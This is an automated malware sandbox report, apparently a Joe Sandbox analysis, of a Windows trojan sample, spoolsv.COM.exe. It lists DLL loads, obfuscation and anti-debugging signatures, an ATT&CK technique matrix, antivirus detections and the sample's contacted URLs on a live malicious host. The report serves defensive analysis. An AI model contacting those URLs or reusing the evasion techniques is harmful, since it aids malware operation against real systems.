          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior

          Data Obfuscation

          barindex
          Source: Yara matchFile source: 5.2.spoolsv.COM.exe.2b20000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000005.00000002.2514939063.0000000002286000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000003.1272909901.000000007FBB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2531784448.000000007FC80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: C:\Users\user\Desktop\spoolsv.COM.exeCode function: 5_2_02B387A0 LoadLibraryW,GetProcAddress,FreeLibrary,5_2_02B387A0
          Source: C:\Users\user\Desktop\spoolsv.COM.exeCode function: 5_2_02B4C2FC push 02B4C367h; ret 5_2_02B4C35F
          Source: C:\Users\user\Desktop\spoolsv.COM.exeCode function: 5_2_02B232FC push eax; ret 5_2_02B23338
          Source: C:\Users\user\Desktop\spoolsv.COM.exeCode function: 5_2_02B2635A push 02B263B7h; ret 5_2_02B263AF
          Source: C:\Users\user\Desktop\spoolsv.COM.exeCode function: 5_2_02B2635C push 02B263B7h; ret 5_2_02B263AF
          Source: C:\Users\user\Desktop\spoolsv.COM.exeCode function: 5_2_02B4C0AC push 02B4C125h; ret 5_2_02B4C11D
          Source: C:\Users\user\Desktop\spoolsv.COM.exeCode function: 5_2_02B4C1F8 push 02B4C288h; ret 5_2_02B4C280
          Source: C:\Users\user\Desktop\spoolsv.COM.exeCode function: 5_2_02B4C144 push 02B4C1ECh; ret 5_2_02B4C1E4
          Source: C:\Users\user\Desktop\spoolsv.COM.exeCode function: 5_2_02B386C0 push 02B38702h; ret 5_2_02B386FA
          Source: C:\Users\user\Desktop\spoolsv.COM.exeCode function: 5_2_02B2673E push 02B26782h; ret 5_2_02B2677A
          Source: C:\Users\user\Desktop\spoolsv.COM.exeCode function: 5_2_02B26740 push 02B26782h; ret 5_2_02B2677A
          Source: C:\Users\user\Desktop\spoolsv.COM.exeCode function: 5_2_02B2C4F4 push ecx; mov dword ptr [esp], edx5_2_02B2C4F9
          Source: C:\Users\user\Desktop\spoolsv.COM.exeCode function: 5_2_02B3E5B4 push ecx; mov dword ptr [esp], edx5_2_02B3E5B9
          Source: C:\Users\user\Desktop\spoolsv.COM.exeCode function: 5_2_02B2D528 push 02B2D554h; ret 5_2_02B2D54C
          Source: C:\Users\user\Desktop\spoolsv.COM.exeCode function: 5_2_02B2CB74 push 02B2CCFAh; ret 5_2_02B2CCF2
          Source: C:\Users\user\Desktop\spoolsv.COM.exeCode function: 5_2_02B4BB6C push 02B4BD94h; ret 5_2_02B4BD8C
          Source: C:\Users\user\Desktop\spoolsv.COM.exeCode function: 5_2_02B2CB56 push 02B2CCFAh; ret 5_2_02B2CCF2
          Source: C:\Users\user\Desktop\spoolsv.COM.exeCode function: 5_2_02B2C8A2 push esp; iretd 5_2_02B2C8C5
          Source: C:\Users\user\Desktop\spoolsv.COM.exeCode function: 5_2_02B37894 push 02B37911h; ret 5_2_02B37909
          Source: C:\Users\user\Desktop\spoolsv.COM.exeCode function: 5_2_02B368D0 push 02B3697Bh; ret 5_2_02B36973
          Source: C:\Users\user\Desktop\spoolsv.COM.exeCode function: 5_2_02B368CE push 02B3697Bh; ret 5_2_02B36973
          Source: C:\Users\user\Desktop\spoolsv.COM.exeCode function: 5_2_02B2C936 push eax; iretd 5_2_02B2C975
          Source: C:\Users\user\Desktop\spoolsv.COM.exeCode function: 5_2_02B3A920 push 02B3A958h; ret 5_2_02B3A950
          Source: C:\Users\user\Desktop\spoolsv.COM.exeCode function: 5_2_02B38916 push 02B38950h; ret 5_2_02B38948
          Source: C:\Users\user\Desktop\spoolsv.COM.exeCode function: 5_2_02B38918 push 02B38950h; ret 5_2_02B38948
          Source: C:\Users\user\Desktop\spoolsv.COM.exeCode function: 5_2_02B3A91F push 02B3A958h; ret 5_2_02B3A950
          Source: C:\Users\user\Desktop\spoolsv.COM.exeCode function: 5_2_02B32EE8 push 02B32F5Eh; ret 5_2_02B32F56
          Source: C:\Users\user\Desktop\spoolsv.COM.exeCode function: 5_2_02B35E04 push ecx; mov dword ptr [esp], edx5_2_02B35E06
          Source: C:\Users\user\Desktop\spoolsv.COM.exeCode function: 5_2_02B32FF3 push 02B33041h; ret 5_2_02B33039
          Source: C:\Users\user\Desktop\spoolsv.COM.exeCode function: 5_2_02B32FF4 push 02B33041h; ret 5_2_02B33039
          Source: C:\Users\user\Desktop\spoolsv.COM.exeCode function: 5_2_02B3A95C GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,5_2_02B3A95C
          Source: C:\Users\user\Desktop\spoolsv.COM.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior

          Malware Analysis System Evasion

          barindex
          Source: C:\Users\user\Desktop\spoolsv.COM.exeMemory allocated: 2B20000 memory commit 500006912Jump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeMemory allocated: 2B21000 memory commit 500178944Jump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeMemory allocated: 2B4C000 memory commit 500002816Jump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeMemory allocated: 2B4D000 memory commit 500199424Jump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeMemory allocated: 2B7E000 memory commit 501014528Jump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeMemory allocated: 2C76000 memory commit 500006912Jump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeMemory allocated: 2C78000 memory commit 500015104Jump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeCode function: 5_2_02B258B4 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,5_2_02B258B4
          Source: spoolsv.COM.exe, 00000005.00000002.2512765082.000000000051E000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000002.2512765082.0000000000566000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: C:\Users\user\Desktop\spoolsv.COM.exeAPI call chain: ExitProcess graph end nodegraph_5-28624

          Anti Debugging

          barindex
          Source: C:\Users\user\Desktop\spoolsv.COM.exeCode function: 5_2_02B3EBF0 GetModuleHandleW,GetProcAddress,CheckRemoteDebuggerPresent,5_2_02B3EBF0
          Source: C:\Users\user\Desktop\spoolsv.COM.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeCode function: 5_2_02B387A0 LoadLibraryW,GetProcAddress,FreeLibrary,5_2_02B387A0
          Source: C:\Users\user\Desktop\spoolsv.COM.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,5_2_02B25A78
          Source: C:\Users\user\Desktop\spoolsv.COM.exeCode function: GetLocaleInfoA,5_2_02B2A798
          Source: C:\Users\user\Desktop\spoolsv.COM.exeCode function: GetLocaleInfoA,5_2_02B2A74C
          Source: C:\Users\user\Desktop\spoolsv.COM.exeCode function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,5_2_02B25B84
          Source: C:\Users\user\Desktop\spoolsv.COM.exeCode function: 5_2_02B29194 GetLocalTime,5_2_02B29194
          Source: C:\Users\user\Desktop\spoolsv.COM.exeCode function: 5_2_02B2B714 GetVersionExA,5_2_02B2B714
          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire Infrastructure1
          Valid Accounts
          1
          Native API
          1
          Valid Accounts
          1
          Valid Accounts
          1
          Valid Accounts
          OS Credential Dumping1
          System Time Discovery
          Remote Services1
          Archive Collected Data
          11
          Encrypted Channel
          Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault AccountsScheduled Task/Job1
          DLL Side-Loading
          1
          Access Token Manipulation
          1
          Access Token Manipulation
          LSASS Memory1
          Query Registry
          Remote Desktop ProtocolData from Removable Media3
          Ingress Tool Transfer
          Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
          DLL Side-Loading
          1
          Virtualization/Sandbox Evasion
          Security Account Manager211
          Security Software Discovery
          SMB/Windows Admin SharesData from Network Shared Drive3
          Non-Application Layer Protocol
          Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
          Deobfuscate/Decode Files or Information
          NTDS1
          Virtualization/Sandbox Evasion
          Distributed Component Object ModelInput Capture114
          Application Layer Protocol
          Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
          Obfuscated Files or Information
          LSA Secrets1
          System Network Connections Discovery
          SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
          DLL Side-Loading
          Cached Domain Credentials1
          File and Directory Discovery
          VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync24
          System Information Discovery
          Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          spoolsv.COM.exe74%VirustotalBrowse
          spoolsv.COM.exe63%ReversingLabsWin32.Trojan.ModiLoader
          spoolsv.COM.exe100%AviraHEUR/AGEN.1326111
          No Antivirus matches
          No Antivirus matches
          No Antivirus matches
          No Antivirus matches
          NameIPActiveMaliciousAntivirus DetectionReputation
          swamfoxinnc.com
          176.123.5.143
          truetrue
            unknown
            NameMaliciousAntivirus DetectionReputation
            https://swamfoxinnc.com/233_Svcrhpjadgytrue
              unknown
              NameSourceMaliciousAntivirus DetectionReputation
              https://swamfoxinnc.com/233_SvcrhpjadgyPspoolsv.COM.exe, 00000005.00000003.2257555113.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.2326326708.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.1980977994.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.1910755600.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.2291813654.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.2015505001.00000000005C6000.00000004.00000020.00020000.00000000.sdmpfalse
                unknown
                https://swamfoxinnc.com/dspoolsv.COM.exe, 00000005.00000003.2466011229.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.2049371642.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.2257555113.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.2362712355.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.2430700731.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.1910755600.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.2326326708.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.1980977994.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.2083372135.00000000005C9000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.2221831704.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.1668484211.00000000005C9000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.1772811035.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.1702373874.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000002.2512765082.000000000051E000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.2118349105.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.1807574988.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.2396794289.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.2291813654.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.2186886665.00000000005CA000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.1533358916.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.1947111725.00000000005C6000.00000004.00000020.00020000.00000000.sdmpfalse
                  unknown
                  https://swamfoxinnc.com/233_Svcrhpjadgy/1fespoolsv.COM.exe, 00000005.00000003.1391456768.00000000005D0000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.1499063783.00000000005CD000.00000004.00000020.00020000.00000000.sdmpfalse
                    unknown
                    https://swamfoxinnc.com/ospoolsv.COM.exe, 00000005.00000003.1634798650.00000000005C6000.00000004.00000020.00020000.00000000.sdmpfalse
                      unknown
                      https://swamfoxinnc.com/233_SvcrhpjadgyHspoolsv.COM.exe, 00000005.00000003.2326326708.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.1980977994.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.1772811035.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.1947111725.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.1910755600.00000000005CD000.00000004.00000020.00020000.00000000.sdmpfalse
                        unknown
                        https://swamfoxinnc.com/233_Svcrhpjadgy8$Q8spoolsv.COM.exe, 00000005.00000002.2512765082.000000000051E000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000002.2512765082.0000000000586000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.2326326708.0000000000587000.00000004.00000020.00020000.00000000.sdmpfalse
                          unknown
                          https://swamfoxinnc.com/spoolsv.COM.exe, 00000005.00000003.2396794289.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000002.2512765082.00000000005C6000.00000004.00000020.00020000.00000000.sdmptrue
                            unknown
                            https://swamfoxinnc.com/233_SvcrhpjadgyuiQspoolsv.COM.exe, 00000005.00000002.2512765082.000000000051E000.00000004.00000020.00020000.00000000.sdmpfalse
                              unknown
                              https://swamfoxinnc.com/233_Svcrhpjadgy%spoolsv.COM.exe, 00000005.00000003.1841751960.00000000005AF000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.1668484211.00000000005AF000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.1772811035.00000000005AF000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.1737114242.00000000005AF000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.1702373874.00000000005AF000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.1807574988.00000000005AF000.00000004.00000020.00020000.00000000.sdmpfalse
                                unknown
                                https://swamfoxinnc.com/233_SvcrhpjadgyWspoolsv.COM.exe, 00000005.00000003.1634798650.00000000005AF000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.1841751960.00000000005AF000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.1668484211.00000000005AF000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.1772811035.00000000005AF000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.1737114242.00000000005AF000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.1702373874.00000000005AF000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.1807574988.00000000005AF000.00000004.00000020.00020000.00000000.sdmpfalse
                                  unknown
                                  https://swamfoxinnc.com/233_SvcrhpjadgyZspoolsv.COM.exe, 00000005.00000003.2430700731.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.2503409286.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000002.2512765082.00000000005C6000.00000004.00000020.00020000.00000000.sdmpfalse
                                    unknown
                                    https://swamfoxinnc.com:443/233_Svcrhpjadgyspoolsv.COM.exe, 00000005.00000003.2396794289.0000000000593000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.2503409286.0000000000593000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000002.2512765082.0000000000593000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.2326326708.0000000000593000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.2430700731.0000000000593000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.2362712355.0000000000593000.00000004.00000020.00020000.00000000.sdmpfalse
                                      unknown
                                      https://swamfoxinnc.com/233_Svcrhpjadgy.spoolsv.COM.exe, 00000005.00000003.1947111725.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.1910755600.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.2118349105.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.2152748998.00000000005C9000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000002.2512765082.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.1875655364.00000000005C6000.00000004.00000020.00020000.00000000.sdmpfalse
                                        unknown
                                        https://swamfoxinnc.com/233_Svcrhpjadgytspoolsv.COM.exe, 00000005.00000003.1632591145.00000000005CC000.00000004.00000020.00020000.00000000.sdmpfalse
                                          unknown
                                          https://swamfoxinnc.com:443/233_Svcrhpjadgy7spoolsv.COM.exe, 00000005.00000003.2396794289.0000000000593000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.2503409286.0000000000593000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000002.2512765082.0000000000593000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.2430700731.0000000000593000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.2362712355.0000000000593000.00000004.00000020.00020000.00000000.sdmpfalse
                                            unknown
                                            https://swamfoxinnc.com/233_Svcrhpjadgyrspoolsv.COM.exe, 00000005.00000003.1356542930.00000000005AF000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.2362712355.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.2326326708.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.1702373874.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.2291813654.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.1632591145.00000000005CC000.00000004.00000020.00020000.00000000.sdmpfalse
                                              unknown
